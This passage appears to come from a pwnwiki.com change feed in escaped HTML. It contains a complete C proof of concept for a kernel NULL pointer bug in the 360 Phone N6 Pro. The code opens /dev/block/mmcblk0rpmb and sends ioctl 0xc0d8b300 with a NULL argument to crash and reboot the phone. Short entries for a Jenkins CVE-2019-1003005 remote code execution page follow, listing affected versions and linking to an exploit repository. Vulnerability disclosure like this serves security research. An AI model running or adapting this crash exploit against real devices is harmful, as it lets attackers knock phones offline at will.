360 Phone N6 Pro 1801-A01&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
/*&lt;br /&gt;
* This is poc of 360 N6 Pro, 1801-A01&lt;br /&gt;
* Android Version: 7.1.1&lt;br /&gt;
* Version Number: V096&lt;br /&gt;
* Kernel Version: Linux localhost 4.4.21-perf #1 SMP PREEMPT Wed Mar 28 15:24:20 UTC 2018 aarch64&lt;br /&gt;
* A NULL pointer bug in the ioctl interface of device file /dev/block/mmcblk0rpmb causes the system crash via IOCTL 3235427072.&lt;br /&gt;
* This Poc should run with permission to do ioctl on /dev/block/mmcblk0rpmb.&lt;br /&gt;
*/&lt;br /&gt;
#include &amp;lt;stdio.h&amp;gt;&lt;br /&gt;
#include &amp;lt;fcntl.h&amp;gt;&lt;br /&gt;
#include &amp;lt;errno.h&amp;gt;&lt;br /&gt;
#include &amp;lt;sys/ioctl.h&amp;gt;&lt;br /&gt;
&lt;br /&gt;
const static char *driver = &amp;quot;/dev/block/mmcblk0rpmb&amp;quot;;&lt;br /&gt;
static command = 3235427072; // 0xc0d8b300&lt;br /&gt;
&lt;br /&gt;
int main(int argc, char **argv, char **env) {&lt;br /&gt;
int fd = 0;&lt;br /&gt;
fd = open(driver, O_RDWR);&lt;br /&gt;
if (fd &amp;lt; 0) {&lt;br /&gt;
printf(&amp;quot;Failed to open %s, with errno %dn&amp;quot;, driver, errno);&lt;br /&gt;
system(&amp;quot;echo 1 &amp;gt; /data/local/tmp/log&amp;quot;);&lt;br /&gt;
return -1;&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
printf(&amp;quot;Try ioctl device file '%s', with command 0x%x and payload NULLn&amp;quot;, driver, command);&lt;br /&gt;
printf(&amp;quot;System will crash and reboot.n&amp;quot;);&lt;br /&gt;
if(ioctl(fd, command, NULL) &amp;lt; 0) {&lt;br /&gt;
printf(&amp;quot;Allocation of structs failed, %dn&amp;quot;, errno);&lt;br /&gt;
system(&amp;quot;echo 2 &amp;gt; /data/local/tmp/log&amp;quot;);&lt;br /&gt;
return -1;&lt;br /&gt;
}&lt;br /&gt;
close(fd);&lt;br /&gt;
return 0;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:360_Phone_N6_Pro%E5%85%A7%E6%A0%B8%E6%BC%8F%E6%B4%9E/Page_display_title/en&amp;diff=3737</id>
		<title>Translations:360 Phone N6 Pro內核漏洞/Page display title/en</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:360_Phone_N6_Pro%E5%85%A7%E6%A0%B8%E6%BC%8F%E6%B4%9E/Page_display_title/en&amp;diff=3737"/>
		<updated>2021-05-31T03:21:25Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;360 Phone N6 Pro Kernel Vulnerability&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;360 Phone N6 Pro Kernel Vulnerability&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2019-1003005%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn&amp;diff=3685</id>
		<title>CVE-2019-1003005遠程代碼執行漏洞/zh-cn</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-1003005%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn&amp;diff=3685"/>
		<updated>2021-05-31T01:46:41Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;==影响版本==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages  /&amp;gt;&lt;br /&gt;
==影响版本==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Jenkins 2.53&lt;br /&gt;
Jenkins 2.122&lt;br /&gt;
Jenkins 2.137&lt;br /&gt;
Jenkins 2.138 啟用匿名讀取&lt;br /&gt;
Jenkins 2.152 啟用匿名讀取&lt;br /&gt;
Jenkins 2.153 啟用匿名讀取&lt;br /&gt;
Script Security Plugin 1.43&lt;br /&gt;
Script Security Plugin 1.48&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
https://github.com/orangetw/awesome-jenkins-rce-2019&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:CVE-2019-1003005%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1/zh-cn&amp;diff=3684</id>
		<title>Translations:CVE-2019-1003005遠程代碼執行漏洞/1/zh-cn</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:CVE-2019-1003005%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/1/zh-cn&amp;diff=3684"/>
		<updated>2021-05-31T01:46:18Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;==影响版本==&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;==影响版本==&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=CVE-2019-1003005%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn&amp;diff=3683</id>
		<title>CVE-2019-1003005遠程代碼執行漏洞/zh-cn</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=CVE-2019-1003005%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-cn&amp;diff=3683"/>
		<updated>2021-05-31T01:46:16Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;CVE-2019-1003005远程代码执行漏洞&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;languages  /&amp;gt;&lt;br /&gt;
&amp;lt;div lang=&amp;quot;chinese&amp;quot; dir=&amp;quot;ltr&amp;quot; class=&amp;quot;mw-content-ltr&amp;quot;&amp;gt;&lt;br /&gt;
==影響版本==&lt;br /&gt;
&amp;lt;/div&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Jenkins 2.53&lt;br /&gt;
Jenkins 2.122&lt;br /&gt;
Jenkins 2.137&lt;br /&gt;
Jenkins 2.138 啟用匿名讀取&lt;br /&gt;
Jenkins 2.152 啟用匿名讀取&lt;br /&gt;
Jenkins 2.153 啟用匿名讀取&lt;br /&gt;
Script Security Plugin 1.43&lt;br /&gt;
Script Security Plugin 1.48&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==EXP==&lt;br /&gt;
https://github.com/orangetw/awesome-jenkins-rce-2019&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Translations:CVE-2019-1003005%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/Page_display_title/zh-cn&amp;diff=3682</id>
		<title>Translations:CVE-2019-1003005遠程代碼執行漏洞/Page display title/zh-cn</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Translations:CVE-2019-1003005%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/Page_display_title/zh-cn&amp;diff=3682"/>
		<updated>2021-05-31T01:46:01Z</updated>

		<summary type="html">&lt;p&gt;Wosk0x01: Created page with &amp;quot;CVE-2019-1003005远程代码执行漏洞&amp;quot;&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;CVE-2019-1003005远程代码执行漏洞&lt;/div&gt;</summary>
		<author><name>Wosk0x01</name></author>
	</entry>
</feed>